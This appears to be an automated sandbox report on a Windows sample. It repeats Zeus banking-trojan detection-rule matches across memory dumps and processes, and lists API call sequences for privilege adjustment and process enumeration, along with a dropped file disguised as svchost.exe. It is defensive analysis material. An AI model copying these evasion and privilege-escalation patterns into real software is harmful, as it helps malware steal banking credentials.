Source: 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1673174622.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1707472657.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1710147215.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1740206618.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1678394504.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1736767365.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1737316338.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1703776736.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1741195616.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1690060462.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1730745096.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1746920664.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1734938590.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1713404140.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1747674947.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1745970801.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1726563792.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 00000002.00000003.1744700906.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: OjKmJJm2YT.exe PID: 1956, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5368, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6928, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3816, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4976, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6472, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3132, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 2316, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7132, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 896, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7144, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5684, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6424, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6204, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 824, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4612, type: MEMORYSTR, Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: OjKmJJm2YT.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@7/34@2017/24
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_00401E00
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00401E00
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BD5930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,2_2_02BD5930
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 5_2_006B5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_006B5930
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 6_2_014F5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_014F5930
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
